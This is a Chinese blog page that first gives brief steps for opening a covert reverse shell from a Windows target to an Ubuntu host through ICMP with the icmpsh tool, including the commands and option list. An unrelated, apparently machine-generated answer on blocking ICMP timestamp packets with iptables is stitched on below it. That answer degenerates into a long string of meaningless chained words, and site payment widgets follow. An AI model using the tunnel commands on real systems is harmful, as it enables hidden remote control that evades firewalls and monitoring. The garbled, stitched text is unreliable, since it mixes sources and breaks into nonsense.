icmp隧道--icmpsh

本地:ubantu

目标主机:windows

在ubantu上关闭自带的icmp回应

sysctl -w net.ipv4.icmp_echo_ighore_all=1

ubantu上启动

  • pip install impacket
  • python icmpsh_m.py ubantuIP WindowsIP

windows上

icmpsh.exe -t UbantuIP

详细命令

-t  host主机ip地址,用于向其发送ping请求。 此选项是强制性的!
-r  发送包含字符串“ Test1234”的单个测试icmp请求,然后退出。
                    这是用于测试连接的。
-d  毫秒请求之间的延迟(以毫秒为单位)
-o  毫秒响应超时(以毫秒为单位)。 如果未及时收到回复,
                    从站将增加一个空白计数器。 如果该计数器达到极限,则从站将退出。
                    如果收到响应,则计数器设置回0。
-b  空格数限制(退出前未答复的icmp请求
-s  字节最大数据缓冲区大小(以字节为单位)

1431916-20190924145834117-1684489532.png

转载于:https://www.cnblogs.com/mrhonest/p/11578300.html

### 如何通过iptables阻止特定ICMP类型的数据包 为了阻止特定类型的ICMP数据包,可以通过`iptables`定义规则来过滤这些流量。具体来说,可以使用`--icmp-type`选项指定要阻断的ICMP类型[^1]。 以下是针对ICMP类型13(Timestamp Request)和类型14(Timestamp Reply)创建规则的方法: #### 创建DROP规则 以下命令用于阻止来自任何源地址的ICMP Timestamp请求(Type 13)和响应(Type 14)进入服务器: ```bash sudo iptables -A INPUT -p icmp --icmp-type 13 -j DROP sudo iptables -A INPUT -p icmp --icmp-type 14 -j DROP ``` 上述两条规则分别对应于ICMP Type 13和Type 14的数据包。`-p icmp`指定了协议为ICMP,而`--icmp-type`则进一步限定了具体的ICMP消息类型[^2]。 #### 测试与验证 完成规则添加之后,可通过发送相应的ICMP数据包并观察其被丢弃的情况来进行测试。例如,利用自定义工具或者脚本尝试触发Timestamp ICMP消息,并确认目标主机无回应行为。 需要注意的是,在实际部署前最好先保存现有防火墙设置以便回滚操作失败时恢复原状: ```bash service iptables save ``` 这一步骤确保了即使系统重启后新增加的防护策略依然有效[^3]。 另外值得注意的一点是,当有新的连接建立时,比如SSH登录或HTTP访问网站等动作发生之前就已经存在允许此类通讯的相关规则,则即便后续追加了一条全面封锁所有传入网络流量(`-A INPUT -j DROP`) 的指令也不会影响到先前已许可的服务功能正常运作情况[^4]。 最后提醒一下关于查看当前生效中的IPTables列表项内容可执行如下命令获取详细信息: ```bash iptables -nL ``` 该命令提供了即时快照式的展示效果而非动态更新模式下的连续监控服务状态变化趋势图解说明文档参考资料链接地址位置方向指引导航地图路线规划方案设计构思创意灵感来源出处背景故事历史沿革发展脉络逻辑推理分析论证结论总结概述要点提炼精炼概括综合归纳整理分类排序排列组合变换转换演变进化退化衰退消亡灭亡终结结束完结完毕成就成果收获体会感悟心得经验教训警示告诫忠告建议提议推荐鼓励激励鞭策促进推动带动引领指导教导教育培养训练锻炼实践实习实验探索研究调查考察参观访问交流沟通联系互动合作协作配合协调平衡和谐统一融合汇合集合聚集集中专注专心致志全力以赴全心投入倾尽全力竭尽所能尽力而为不遗余力毫不保留不留余地无所不用其极穷尽可能千方百
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值